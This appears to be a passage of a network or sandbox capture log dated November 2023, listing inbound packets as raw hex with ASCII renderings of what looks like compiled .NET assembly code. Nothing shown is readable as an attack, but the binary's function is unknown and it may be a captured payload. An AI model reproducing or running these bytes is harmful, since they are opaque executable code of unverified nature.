2023-11-18 09:02:37 UTC	598	IN	Data Raw: 1b 6f 12 00 00 0a dc 0e 04 2c 37 02 72 71 01 00 70 6f 22 00 00 0a 26 02 72 ce 02 00 70 28 f2 00 00 06 6f 22 00 00 0a 26 02 72 3f 00 00 70 6f 22 00 00 0a 26 02 72 7d 01 00 70 6f 2e 00 00 0a 26 2b 26 72 da 02 00 70 09 2d 07 72 19 02 00 70 2b 06 09 6f 34 00 00 0a 06 6f 40 00 00 0a 28 41 00 00 0a 73 42 00 00 0a 7a 02 72 5f 00 00 70 6f 2e 00 00 0a 26 2a 00 01 10 00 00 02 00 0c 01 9b a7 01 0e 00 00 00 00 2e 20 00 01 00 00 80 01 00 00 04 2a 1e 02 28 44 00 00 0a 2a 13 30 02 00 14 00 00 00 07 00 00 11 73 45 00 00 0a 0a 02 06 6f 0c 00 00 06 06 6f 2f 00 00 0a 2a 22 02 03 6f 0a 00 00 06 2a 00 00 00 13 30 02 00 14 00 00 00 07 00 00 11 73 45 00 00 0a 0a 02 06 6f 0a 00 00 06 06 6f 2f 00 00 0a 2a 6a 02 7b 02 00 00 04 2d 0b 02 73 46 00 00 0a 7d 02 00 00 04 02 7b 02 00 00 Data Ascii: o,7rqpo"&rp(o"&r?po"&r}po.&+&rp-rp+o4o@(AsBzr_po.&. (D0sEoo/"o0sEoo/j{-sF}{
2023-11-18 09:02:37 UTC	600	IN	Data Raw: 00 00 00 14 00 00 00 17 00 00 00 1a 00 00 00 20 00 00 00 2b 21 17 2a 19 2a 18 2a 1c 2a 1d 2a 1e 2a 1f 0f 2a 1f 09 2a 1f 0a 2a 1f 0b 2a 1f 0c 2a 1f 0e 2a 1f 10 2a 72 cc 03 00 70 02 8c 1f 00 00 01 28 70 00 00 0a 73 71 00 00 0a 7a 00 13 30 04 00 2f 00 00 00 0f 00 00 11 02 6f 72 00 00 0a 03 16 12 00 6f 73 00 00 0a 2c 1c 06 6f 74 00 00 0a 2c 14 06 6f 75 00 00 0a 2d 0c 06 6f 74 00 00 0a a5 19 00 00 1b 2a 04 2a 72 02 6f 65 00 00 0a 74 7e 00 00 01 6f 76 00 00 0a 03 28 35 00 00 06 6f 77 00 00 0a 2a 1b 30 02 00 3a 00 00 00 10 00 00 11 02 6f 78 00 00 0a 0a 2b 19 06 6f 79 00 00 0a 0b 07 6f 7a 00 00 0a 03 28 7b 00 00 0a 2c 04 07 0c de 16 06 6f 13 00 00 0a 2d df de 0a 06 2c 06 06 6f 12 00 00 0a dc 14 2a 08 2a 00 00 01 10 00 00 02 00 07 00 25 2c 00 0a 00 00 00 00 1b 30 Data Ascii: +!***********rp(psqz0/oros,ot,ou-otroet~ov(5ow0:ox+oyoz({,o-,o*%,0
2023-11-18 09:02:37 UTC	601	IN	Data Raw: 7a 00 00 06 02 03 6f 95 00 00 0a 28 79 00 00 06 0a 06 60 2a 36 02 03 6f 96 00 00 0a 28 7c 00 00 06 2a 00 00 13 30 03 00 30 00 00 00 14 00 00 11 02 03 6f 97 00 00 0a 6f 98 00 00 0a 28 79 00 00 06 02 03 6f 99 00 00 0a 28 7c 00 00 06 0a 02 03 6f 9a 00 00 0a 28 77 00 00 06 0b 06 60 07 60 2a 13 30 03 00 1c 00 00 00 15 00 00 11 02 03 6f 90 00 00 0a 28 79 00 00 06 02 03 6f 91 00 00 0a 28 79 00 00 06 0a 06 60 2a 13 30 03 00 2b 00 00 00 14 00 00 11 02 03 6f 9b 00 00 0a 28 7a 00 00 06 02 03 6f 9c 00 00 0a 28 7a 00 00 06 0a 02 03 6f 9d 00 00 0a 28 79 00 00 06 0b 06 60 07 60 2a 00 13 30 03 00 2b 00 00 00 14 00 00 11 02 03 6f 9e 00 00 0a 28 79 00 00 06 02 03 6f 9f 00 00 0a 28 79 00 00 06 0a 02 03 6f a0 00 00 0a 28 79 00 00 06 0b 06 60 07 60 2a 36 02 03 6f a1 00 00 0a Data Ascii: zo(y`6o(\|00oo(yo(\|o(w``0o(yo(y`0+o(zo(zo(y``0+o(yo(yo(y``6o
2023-11-18 09:02:37 UTC	602	IN	Data Raw: 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 28 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 34 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 3c 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 46 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 54 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 62 06 00 70 14 fe 06 d3 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 72 06 00 70 14 fe 06 d4 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 84 06 00 70 14 fe 06 d3 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 94 06 00 70 14 fe 06 d4 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 a6 06 00 70 14 fe 06 ce 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 b4 06 00 70 14 Data Ascii: pso%r(pso%r4pso%r<pso%rFpso%rTpso%rbpso%rrpso%rpso%rpso%rpso%rp
2023-11-18 09:02:37 UTC	604	IN	Data Raw: 00 00 1b 00 00 11 20 00 04 00 00 73 20 00 00 0a 0a 06 73 14 01 00 06 0b 03 07 02 6f 0e 00 00 06 de 0a 07 2c 06 07 6f 12 00 00 0a dc 06 6f 2f 00 00 0a 2a 00 00 00 01 10 00 00 02 00 12 00 0a 1c 00 0a 00 00 00 00 1b 30 04 00 9c 01 00 00 1c 00 00 11 7e 58 00 00 04 73 ce 00 00 0a 0a 02 03 06 28 85 00 00 06 2c 0e 06 6f cf 00 00 0a 28 07 00 00 2b 16 30 05 04 14 51 16 2a 73 4a 00 00 06 0b 17 0c 06 6f cf 00 00 0a 6f d1 00 00 0a 0d 38 3f 01 00 00 09 6f d2 00 00 0a 13 04 06 11 04 6f d3 00 00 0a 13 05 08 2d 0d 07 72 e4 08 00 70 6f 46 00 00 06 2b 02 16 0c 11 05 7e 5a 00 00 04 25 2d 17 26 7e 59 00 00 04 fe 06 ce 01 00 06 73 d4 00 00 0a 25 80 5a 00 00 04 28 08 00 00 2b 13 06 11 06 28 07 00 00 2b 13 07 11 07 17 33 26 02 11 04 07 28 f1 00 00 06 07 72 3f 00 00 70 6f 46 00 Data Ascii: s so,oo/0~Xs(,o(+0QsJoo8?oo-rpoF+~Z%-&~Ys%Z(+(+3&(r?poF
2023-11-18 09:02:37 UTC	605	IN	Data Raw: 00 00 0a 7a 06 2a 00 00 00 13 30 05 00 d2 02 00 00 1f 00 00 11 73 4a 00 00 06 0a 03 6f c8 00 00 0a 12 01 28 2e 00 00 06 39 b2 02 00 00 07 45 0f 00 00 00 1b 00 00 00 31 00 00 00 55 00 00 00 6b 00 00 00 cd 00 00 00 64 01 00 00 88 01 00 00 06 02 00 00 6a 02 00 00 dd 01 00 00 05 00 00 00 f3 01 00 00 27 02 00 00 5f 02 00 00 54 02 00 00 38 65 02 00 00 06 03 6f da 00 00 0a 6f 2f 00 00 0a 6f 46 00 00 06 38 5b 02 00 00 03 6f da 00 00 0a 74 34 00 00 1b 06 28 fa 00 00 06 38 45 02 00 00 06 03 6f da 00 00 0a a5 ae 00 00 01 2d 07 72 d6 09 00 70 2b 05 72 da 09 00 70 6f 46 00 00 06 38 21 02 00 00 06 03 6f da 00 00 0a 6f 2f 00 00 0a 6f 46 00 00 06 38 0b 02 00 00 02 7b 15 00 00 04 7b 3d 00 00 04 28 e7 00 00 06 03 6f da 00 00 0a a5 b3 00 00 01 02 7b 15 00 00 04 7b 3d 00 00 Data Ascii: z*0sJo(.9E1Ukdj'_T8eoo/oF8[ot4(8Eo-rp+rpoF8!oo/oF8{{=(o{{=
2023-11-18 09:02:37 UTC	606	IN	Data Raw: 28 0d 00 00 2b 6f 66 00 00 0a 28 0e 00 00 2b 03 6f 9a 00 00 0a 28 fb 00 00 06 0c 08 2c 37 02 07 03 6f 97 00 00 0a 6f e5 00 00 0a 03 6f 97 00 00 0a 6f e6 00 00 0a 16 12 00 28 e6 00 00 06 0d 02 09 03 6f 97 00 00 0a 6f e5 00 00 0a 06 16 28 e3 00 00 06 2b 02 07 0d 6f 6a 00 00 0a 6f e9 00 00 0a 8c 36 00 00 1b 13 04 11 04 6f 13 00 00 0a 26 7e ea 00 00 0a 13 05 03 6f 99 00 00 0a 6f d1 00 00 0a 13 06 38 42 01 00 00 11 06 6f d2 00 00 0a 11 04 6f eb 00 00 0a 6f 34 00 00 0a 28 f2 00 00 06 13 07 09 6f 0b 01 00 06 11 05 6f 46 00 00 06 02 6f 06 00 00 2b 13 08 08 2d 54 09 6f 08 01 00 06 11 05 6f 46 00 00 06 09 6f 08 01 00 06 6f 47 00 00 06 09 6f 08 01 00 06 11 08 6f 46 00 00 06 09 6f 08 01 00 06 72 62 0a 00 70 6f 46 00 00 06 09 6f 08 01 00 06 11 07 6f 46 00 00 06 09 6f Data Ascii: (+of(+o(,7oooo(oo(+ojo6o&~oo8Booo4(ooFo+-TooFooGooForbpoFooFo
2023-11-18 09:02:37 UTC	608	IN	Data Raw: 2c 0d 06 6f b8 00 00 0a 02 6f 06 00 00 2b 2a 03 6f b8 00 00 0a 75 38 00 00 01 0b 07 2c 09 02 07 17 28 be 00 00 06 2a 03 6f b8 00 00 0a 75 52 00 00 01 0c 08 2c 09 02 08 17 28 c0 00 00 06 2a 03 6f b8 00 00 0a 75 51 00 00 01 0d 09 2c 22 09 6f bc 00 00 0a 1f 0d 33 18 02 72 cc 09 00 70 09 6f 90 00 00 0a 09 6f 91 00 00 0a 28 bc 00 00 06 2a 73 4a 00 00 06 25 72 18 0b 00 70 6f 46 00 00 06 25 03 6f b8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 25 72 d7 00 00 70 6f 46 00 00 06 2a 46 73 4a 00 00 06 25 72 26 0b 00 70 6f 46 00 00 06 2a 00 00 00 13 30 04 00 27 00 00 00 19 00 00 11 14 0a 02 03 12 00 28 8f 00 00 06 2c 02 06 2a 02 72 e4 08 00 70 03 6f 90 00 00 0a 03 6f 91 00 00 0a 28 bc 00 00 06 2a 72 73 4a 00 00 06 25 72 30 0b 00 70 03 6f f3 00 00 0a 28 f4 00 00 0a 6f 46 Data Ascii: ,oo+ou8,(ouR,(ouQ,"o3rpoo(sJ%rpoF%oo+oF%rpoFFsJ%r&poF0'(,rpoo(rsJ%r0po(oF
2023-11-18 09:02:37 UTC	609	IN	Data Raw: 00 00 0a 7a 02 17 7d 1b 00 00 04 02 7b 1a 00 00 04 03 6f fa 00 00 0a 6f 3c 01 00 06 0a 02 28 81 00 00 06 6f 02 01 00 06 06 6f fb 00 00 0a 2d 12 02 28 81 00 00 06 6f 03 01 00 06 06 17 6f fc 00 00 0a 06 2a 00 00 13 30 03 00 5a 00 00 00 2d 00 00 11 73 4a 00 00 06 0a 03 75 7b 00 00 01 0b 07 2d 06 73 c9 00 00 0a 7a 02 06 07 6f fd 00 00 0a 28 f9 00 00 06 06 72 d3 00 00 70 6f 46 00 00 06 07 0c 08 2c 13 08 6f fe 00 00 0a 2c 0b 06 72 74 0b 00 70 6f 46 00 00 06 06 04 6f 46 00 00 06 06 72 d7 00 00 70 6f 46 00 00 06 06 2a 00 00 13 30 03 00 79 00 00 00 12 00 00 11 73 4a 00 00 06 0a 02 04 28 ee 00 00 06 2c 0b 06 72 d3 00 00 70 6f 46 00 00 06 06 04 02 6f 06 00 00 2b 6f 46 00 00 06 02 04 28 ee 00 00 06 2c 0b 06 72 d7 00 00 70 6f 46 00 00 06 06 03 6f 46 00 00 06 02 05 28 Data Ascii: z}{oo<(oo-(oo0Z-sJu{-szo(rpoF,o,rtpoFoFrpoF0ysJ(,rpoFo+oF(,rpoFoF(
2023-11-18 09:02:37 UTC	610	IN	Data Raw: ed 00 00 06 2d 0f 02 11 05 6f 24 00 00 0a 28 eb 00 00 06 2b 07 17 2b 04 16 2b 01 17 13 06 02 7b 17 00 00 04 11 06 2d 03 16 2b 01 17 6f 04 01 00 0a 06 6f 02 01 00 06 6f 47 00 00 0a 13 07 11 05 6f 24 00 00 0a 02 6f 06 00 00 2b 13 08 02 7b 17 00 00 04 6f 05 01 00 0a 26 02 11 08 06 11 05 11 07 28 c2 00 00 06 05 0b 16 0c 11 04 17 58 13 04 11 04 09 3f 34 ff ff ff 04 1f 10 2e 0a 04 1f 15 2e 05 04 1f 1b 33 3b 06 6f 09 01 00 06 72 82 0c 00 70 6f 46 00 00 06 02 7b 17 00 00 04 16 6f 04 01 00 0a 06 6f 09 01 00 06 0e 04 02 6f 06 00 00 2b 6f 46 00 00 06 02 7b 17 00 00 04 6f 05 01 00 0a 26 02 7b 1a 00 00 04 6f 3a 01 00 06 02 28 82 00 00 06 2d 0c 02 7b 16 00 00 04 6f ee 00 00 0a 26 06 2a 00 13 30 04 00 cf 01 00 00 31 00 00 11 14 0a 04 03 3b 42 01 00 00 03 75 0c 00 00 02 Data Ascii: -o$(+++{-+oooGo$o+{o&(X?4..3;orpoF{ooo+oF{o&{o:(-{o&*01;Bu
2023-11-18 09:02:37 UTC	612	IN	Data Raw: 00 00 00 36 02 7e 1c 00 00 04 03 28 cc 00 00 06 2a 36 02 7e 1d 00 00 04 03 28 cc 00 00 06 2a de 03 04 6f 08 01 00 0a 6f cd 00 00 0a 6f 09 01 00 0a 2d 0b 72 42 0d 00 70 73 71 00 00 0a 7a 03 04 6f 08 01 00 0a 6f cd 00 00 0a 6f 0a 01 00 0a 02 04 6f c5 01 00 06 2a 13 30 04 00 bb 00 00 00 12 00 00 11 73 4a 00 00 06 0a 03 6f 96 00 00 0a 6f d9 00 00 0a 17 31 34 04 2c 0b 06 72 d3 00 00 70 6f 46 00 00 06 06 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 04 2c 0b 06 72 d7 00 00 70 6f 46 00 00 06 06 72 7e 0c 00 70 6f 46 00 00 06 06 7e 1e 00 00 04 03 6f 08 01 00 0a 6f cd 00 00 0a 6f 0b 01 00 0a 6f 46 00 00 06 06 72 7e 0c 00 70 6f 46 00 00 06 04 2c 0b 06 72 d3 00 00 70 6f 46 00 00 06 06 03 6f 96 00 00 0a 03 6f 96 00 00 0a 6f d9 00 00 0a 17 59 6f Data Ascii: 6~(6~(ooo-rBpsqzoooo*0sJoo14,rpoFooo+oF,rpoFr~poF~ooooFr~poF,rpoFoooYo
2023-11-18 09:02:37 UTC	613	IN	Data Raw: 06 00 00 2b 28 70 00 00 0a 6f 46 00 00 06 2b 18 07 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 07 72 b1 11 00 70 6f 46 00 00 06 07 2a 36 02 03 72 92 15 00 70 6f c8 00 00 06 2a 46 73 4a 00 00 06 25 72 a6 15 00 70 6f 46 00 00 06 2a d2 73 4a 00 00 06 25 72 c4 15 00 70 6f 46 00 00 06 25 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 25 72 d7 00 00 70 6f 46 00 00 06 2a 13 30 03 00 74 00 00 00 12 00 00 11 73 4a 00 00 06 0a 06 72 d4 15 00 70 6f 46 00 00 06 06 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 03 6f 96 00 00 0a 6f d9 00 00 0a 18 33 30 06 72 39 00 00 70 6f 46 00 00 06 06 03 6f 96 00 00 0a 17 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 06 72 d7 00 00 70 6f 46 00 00 06 2b 0b 06 72 Data Ascii: +(poF+ooo+oFrpoF6rpoFsJ%rpoFsJ%rpoF%ooo+oF%rpoF0tsJrpoFooo+oFoo30r9poFooo+oFrpoF+r
2023-11-18 09:02:37 UTC	614	IN	Data Raw: 00 0a 0a 28 49 00 00 0a 73 11 01 00 0a 0b 7e ea 00 00 0a 0c 03 6f 08 01 00 06 6f 48 00 00 06 2d 06 72 39 00 00 70 0c 03 6f 02 01 00 06 6f 4b 00 00 0a 0d 2b 16 12 03 28 4c 00 00 0a 13 04 02 03 11 04 06 07 12 02 28 e0 00 00 06 12 03 28 4f 00 00 0a 2d e1 de 0e 12 03 fe 16 0f 00 00 1b 6f 12 00 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 36 00 23 59 00 0e 00 00 00 00 2e 02 03 04 05 17 28 e3 00 00 06 2a 13 30 03 00 68 00 00 00 00 00 00 00 03 6f 02 01 00 06 6f 47 00 00 0a 2c 0f 05 03 6f 02 01 00 06 16 6f ff 00 00 0a 2e 3a 03 6f 02 01 00 06 05 6f 4e 00 00 0a 03 6f 09 01 00 06 72 62 0a 00 70 6f 46 00 00 06 03 6f 09 01 00 06 05 6f 46 00 00 06 02 7b 18 00 00 04 05 6f 30 01 00 06 16 6f 0e 01 00 0a 0e 04 2c 0d 02 7b 1a 00 00 04 04 05 6f 3b 01 00 06 2a 1b 30 03 00 88 00 Data Ascii: (Is~ooH-r9pooK+(L((O-o6#Y.(0hooG,oo.:ooNorbpoFooF{o0o,{o;*0
2023-11-18 09:02:37 UTC	616	IN	Data Raw: 86 03 6f bc 00 00 0a 1f 2e 2e 15 03 6f bc 00 00 0a 1f 38 2e 0b 03 6f bc 00 00 0a 1f 2b fe 01 2a 17 2a aa 1d 03 6f bc 00 00 0a 2e 1f 1f 10 03 6f bc 00 00 0a 2e 15 1f 15 03 6f bc 00 00 0a 2e 0b 1f 1b 03 6f bc 00 00 0a fe 01 2a 17 2a 00 00 00 13 30 02 00 19 00 00 00 3d 00 00 11 03 6f bc 00 00 0a 0a 06 1b 2e 0a 06 1f 2b 2e 05 06 1f 2e 33 02 16 2a 17 2a 00 00 00 13 30 02 00 5c 01 00 00 00 00 00 00 04 1f 14 30 26 04 1f 0b 30 12 04 1f 09 2e 4b 04 1f 0b 3b bf 00 00 00 38 3a 01 00 00 04 1f 0f 2e 4f 04 1f 14 2e 7d 38 2b 01 00 00 04 1f 2d 30 15 04 1f 1f 3b 9e 00 00 00 04 1f 2d 3b a0 00 00 00 38 11 01 00 00 04 1f 33 3b ae 00 00 00 04 1f 34 3b d9 00 00 00 38 fc 00 00 00 03 6f 04 01 00 06 2d 0c 03 6f 0c 01 00 06 6f 48 00 00 06 2a 16 2a 03 6f 08 01 00 06 6f 48 00 00 06 Data Ascii: o..o8.o+o.o.o.o0=o.+..30\0&0.K;8:.O.}8+-0;-;83;4;8o-ooHooH
2023-11-18 09:02:37 UTC	616	IN	Data Raw: 00 00 06 2c 17 03 6f 0c 01 00 06 6f 48 00 00 06 2c 0a 03 6f 04 01 00 06 14 fe 01 2a 16 2a 03 6f 04 01 00 06 14 fe 01 2a 03 6f 08 01 00 06 6f 48 00 00 06 2c 0c 03 6f 0b 01 00 06 6f 48 00 00 06 2a 16 2a 03 6f 08 01 00 06 6f 48 00 00 06 2c 24 03 6f 0b 01 00 06 6f 48 00 00 06 2c 17 03 6f 0c 01 00 06 6f 48 00 00 06 2c 0a 03 6f fe 00 00 06 16 fe 01 2a 16 2a 03 6f 08 01 00 06 6f 48 00 00 06 2c 19 03 6f 0b 01 00 06 6f 48 00 00 06 2c 0c 03 6f 0c 01 00 06 6f 48 00 00 06 2a 16 2a 73 88 00 00 0a 7a 96 03 6f bc 00 00 0a 1b 33 13 04 02 03 74 54 00 00 01 6f 1a 01 00 0a 6f 46 00 00 06 2a 02 03 04 28 f1 00 00 06 2a ee 02 03 28 ee 00 00 06 2c 24 04 72 d3 00 00 70 6f 46 00 00 06 04 03 02 6f 06 00 00 2b 6f 46 00 00 06 04 72 d7 00 00 70 6f 46 00 00 06 2a 04 03 02 6f 06 00 00 Data Ascii: ,ooH,o*oooH,ooHooH,$ooH,ooH,oooH,ooH,ooH*szo3tTooF((,$rpoFo+oFrpoFo
2023-11-18 09:02:37 UTC	617	IN	Data Raw: 2a 6a 02 7b 23 00 00 04 2d 0b 02 73 46 00 00 0a 7d 23 00 00 04 02 7b 23 00 00 04 2a 6a 02 7b 24 00 00 04 2d 0b 02 73 1e 01 00 0a 7d 24 00 00 04 02 7b 24 00 00 04 2a 1e 02 7b 25 00 00 04 2a 22 02 03 7d 25 00 00 04 2a 1e 02 7b 26 00 00 04 2a 22 02 03 7d 26 00 00 04 2a 1e 02 7b 27 00 00 04 2a 1e 02 7b 28 00 00 04 2a 6a 02 7b 29 00 00 04 2d 0b 02 73 4a 00 00 06 7d 29 00 00 04 02 7b 29 00 00 04 2a 6a 02 7b 2a 00 00 04 2d 0b 02 73 4a 00 00 06 7d 2a 00 00 04 02 7b 2a 00 00 04 2a 6a 02 7b 2b 00 00 04 2d 0b 02 73 4a 00 00 06 7d 2b 00 00 04 02 7b 2b 00 00 04 2a 1e 02 7b 2c 00 00 04 2a 22 02 03 7d 2c 00 00 04 2a b6 02 7b 2b 00 00 04 2c 0f 02 7b 2b 00 00 04 6f 48 00 00 06 2d 02 17 2a 02 7b 25 00 00 04 2c 02 17 2a 02 7b 26 00 00 04 2c 02 17 2a 16 2a 00 00 1b 30 03 00 Data Ascii: j{#-sF}#{#j{$-s}${${%"}%{&"}&{'{(j{)-sJ}){)j{-sJ}{*j{+-sJ}+{+{,"},{+,{+oH-{%,{&,**0
2023-11-18 09:02:37 UTC	619	IN	Data Raw: 00 0a dc 06 6f 2f 00 00 0a 2a 01 10 00 00 02 00 33 00 30 63 00 0a 00 00 00 00 c2 02 6f df 00 00 0a 1f 0a 58 18 58 73 20 00 00 0a 02 6f 22 00 00 0a 1f 5b 6f 2f 01 00 0a 03 6f 30 01 00 0a 1f 5d 6f 2f 01 00 0a 6f 2f 00 00 0a 2a 36 28 7f 00 00 0a 02 03 28 31 01 00 0a 2a 42 02 28 7f 00 00 0a 03 04 6f 32 01 00 0a 26 02 2a 13 30 02 00 21 00 00 00 40 00 00 11 02 6f 26 00 00 0a 26 16 0a 2b 10 02 72 42 18 00 70 6f 22 00 00 0a 26 06 17 58 0a 06 03 32 ec 02 2a 7e 28 7f 00 00 0a 72 4e 03 00 70 17 8d 12 00 00 01 25 16 02 8c 19 00 00 1b a2 28 31 01 00 0a 2a 22 02 16 28 1e 01 00 06 2a 00 00 13 30 02 00 26 00 00 00 40 00 00 11 02 2c 21 03 0a 2b 14 02 06 6f 33 01 00 0a 28 34 01 00 0a 2d 02 16 2a 06 17 58 0a 06 02 6f df 00 00 0a 32 e3 17 2a 00 00 13 30 02 00 2f 00 00 00 40 Data Ascii: o/30coXXs o"[o/o0]o/o/6((1B(o2&0!@o&&+rBpo"&X2~(rNp%(1"(0&@,!+o3(4-Xo2*0/@
2023-11-18 09:02:37 UTC	620	IN	Data Raw: 01 00 0a 2a 32 02 28 4c 01 00 06 73 42 01 00 0a 2a 32 02 28 4c 01 00 06 73 43 01 00 0a 2a 32 02 28 4c 01 00 06 73 44 01 00 0a 2a 32 02 28 4c 01 00 06 73 45 01 00 0a 2a 32 02 28 4c 01 00 06 73 46 01 00 0a 2a 13 30 07 00 b5 00 00 00 47 00 00 11 03 d0 91 00 00 01 28 47 01 00 0a 28 48 01 00 0a 2d 12 03 d0 90 00 00 01 28 47 01 00 0a 28 48 01 00 0a 2c 55 7e 41 00 00 04 0a 28 49 01 00 0a 2c 46 28 4a 01 00 0a 72 78 18 00 70 18 8d 12 00 00 01 25 16 06 2d 07 72 fb 18 00 70 2b 06 06 6f 2f 00 00 0a a2 25 17 03 14 28 4b 01 00 0a 2d 07 72 fb 18 00 70 2b 06 03 6f 2f 00 00 0a a2 28 4c 01 00 0a 28 4d 01 00 0a 06 2a 28 49 01 00 0a 2c 33 28 4a 01 00 0a 72 09 19 00 70 17 8d 12 00 00 01 25 16 03 14 28 4b 01 00 0a 2d 07 72 fb 18 00 70 2b 06 03 6f 2f 00 00 0a a2 28 4c 01 00 0a Data Ascii: 2(LsB2(LsC2(LsD2(LsE2(LsF0G(G(H-(G(H,U~A(I,F(Jrxp%-rp+o/%(K-rp+o/(L(M*(I,3(Jrp%(K-rp+o/(L
2023-11-18 09:02:37 UTC	621	IN	Data Raw: 00 00 06 72 5e 17 00 70 28 7b 00 00 0a 3a ad 00 00 00 38 61 01 00 00 06 72 54 17 00 70 28 7b 00 00 0a 3a 98 00 00 00 38 4c 01 00 00 06 72 9f 1b 00 70 28 7b 00 00 0a 3a 8a 00 00 00 38 37 01 00 00 06 72 af 1b 00 70 28 7b 00 00 0a 3a 90 00 00 00 38 22 01 00 00 06 72 b9 1b 00 70 28 7b 00 00 0a 3a 96 00 00 00 38 0d 01 00 00 06 72 cb 1b 00 70 28 7b 00 00 0a 3a 99 00 00 00 38 f8 00 00 00 06 72 d7 1b 00 70 28 7b 00 00 0a 3a 9c 00 00 00 38 e3 00 00 00 06 72 e1 1b 00 70 28 7b 00 00 0a 3a 9c 00 00 00 38 ce 00 00 00 06 72 02 17 00 70 28 7b 00 00 0a 3a ad 00 00 00 38 b9 00 00 00 07 28 61 01 00 0a 2a 1f 0c 13 06 03 12 02 28 d5 01 00 06 16 fe 01 13 05 16 0d 16 13 04 38 a8 00 00 00 1f 0c 13 06 03 12 02 28 d5 01 00 06 16 fe 01 13 05 16 0d 17 13 04 38 8d 00 00 00 1f 0c 13 Data Ascii: r^p({:8arTp({:8Lrp({:87rp({:8"rp({:8rp({:8rp({:8rp({:8rp({:8(a*(8(8
2023-11-18 09:02:37 UTC	622	IN	Data Raw: 16 13 04 2b 48 03 12 08 28 d4 01 00 06 2c 15 03 12 09 28 d6 01 00 06 2c 0b 07 11 08 11 09 28 62 01 00 0a 2a 07 28 63 01 00 0a 2a 07 12 0a fe 15 49 00 00 1b 11 0a 28 64 01 00 0a 2a 72 3f 1b 00 70 06 28 70 00 00 0a 73 42 00 00 0a 7a 11 06 2c 1f 11 06 1f 0c 33 30 11 05 2d 0b 07 09 11 04 08 28 65 01 00 0a 2a 07 09 11 04 28 66 01 00 0a 2a 11 05 2d 0a 07 11 04 08 28 67 01 00 0a 2a 07 11 04 28 68 01 00 0a 2a 72 3f 1b 00 70 06 28 70 00 00 0a 73 42 00 00 0a 7a 13 30 04 00 d8 03 00 00 4a 00 00 11 03 2d 0b 72 f1 1b 00 70 73 1c 01 00 0a 7a 03 6f 65 00 00 0a 75 7e 00 00 01 0a 06 2d 11 72 3f 1b 00 70 03 28 70 00 00 0a 73 60 01 00 0a 7a 03 6f 72 00 00 0a 0b 06 6f 6c 00 00 0a 0c 08 45 0d 00 00 00 e8 00 00 00 05 00 00 00 1b 00 00 00 30 03 00 00 b5 00 00 00 89 00 00 00 73 Data Ascii: +H(,(,(b(cI(dr?p(psBz,30-(e(f-(g(h*r?p(psBz0J-rpszoeu~-r?p(ps`zorolE0s
2023-11-18 09:02:37 UTC	623	IN	Data Raw: 2c 29 03 74 14 00 00 02 11 07 6f 78 01 00 0a 11 07 6f 79 01 00 0a 11 07 6f 7a 01 00 0a 7e 7b 01 00 0a 28 5f 01 00 06 13 06 2b 21 03 74 14 00 00 02 12 05 28 76 01 00 0a 12 05 28 7c 01 00 0a 16 7e 7b 01 00 0a 28 5f 01 00 06 13 06 06 6f 7d 01 00 0a 11 06 6f 7e 01 00 0a 26 11 04 6f 13 00 00 0a 3a 79 ff ff ff de 0c 11 04 2c 07 11 04 6f 12 00 00 0a dc 07 2c 66 16 07 6f 7f 01 00 0a 2f 5d 04 75 1a 00 00 01 2d 1b 04 75 13 00 00 01 2d 13 04 75 19 00 00 01 2d 0b 72 e2 1d 00 70 73 71 00 00 0a 7a 07 6f 80 01 00 0a 13 08 2b 17 12 08 28 81 01 00 0a 13 09 06 6f 7d 01 00 0a 11 09 6f 82 01 00 0a 26 12 08 28 83 01 00 0a 2d e0 de 0e 12 08 fe 16 4f 00 00 1b 6f 12 00 00 0a dc 06 13 0a de 09 26 06 6f 84 01 00 0a fe 1a 11 0a 2a 00 41 4c 00 00 02 00 00 00 62 00 00 00 8b 00 00 00 Data Ascii: ,)toxoyoz~{(_+!t(v(\|~{(_o}o~&o:y,o,fo/]u-u-u-rpsqzo+(o}o&(-Oo&o*ALb
2023-11-18 09:02:37 UTC	624	IN	Data Raw: 6f 13 00 00 0a 2d a6 de 15 11 06 75 62 00 00 01 13 0a 11 0a 2c 07 11 0a 6f 12 00 00 0a dc 06 72 d7 00 00 70 6f 22 00 00 0a 26 08 06 6f 2f 00 00 0a 6f 70 01 00 0a 08 6f 98 01 00 0a 26 08 72 7a 1f 00 70 07 05 6f 9a 01 00 0a 28 70 00 00 0a 6f 70 01 00 0a 08 73 a4 01 00 0a 13 0b 07 11 0b 6f a5 01 00 0a 11 0b 09 6f a6 01 00 0a 26 04 6f 94 01 00 0a 6f 9e 01 00 0a 13 06 2b 21 11 06 6f 16 00 00 0a 74 d3 00 00 01 6f a7 01 00 0a 13 0c 09 6f 94 01 00 0a 11 0c 6f a8 01 00 0a 26 11 06 6f 13 00 00 0a 2d d6 de 15 11 06 75 62 00 00 01 13 0a 11 0a 2c 07 11 0a 6f 12 00 00 0a dc 11 0b 09 6f a9 01 00 0a 26 de 20 11 0b 2c 07 11 0b 6f 12 00 00 0a dc 09 2c 06 09 6f 12 00 00 0a dc 08 2c 06 08 6f 12 00 00 0a dc 2a 00 41 7c 00 00 02 00 00 00 4d 00 00 00 5e 00 00 00 ab 00 00 00 15 Data Ascii: o-ub,orpo"&o/opo&rzpo(popsoo&oo+!otooo&o-ub,oo& ,o,o,o*A\|M^
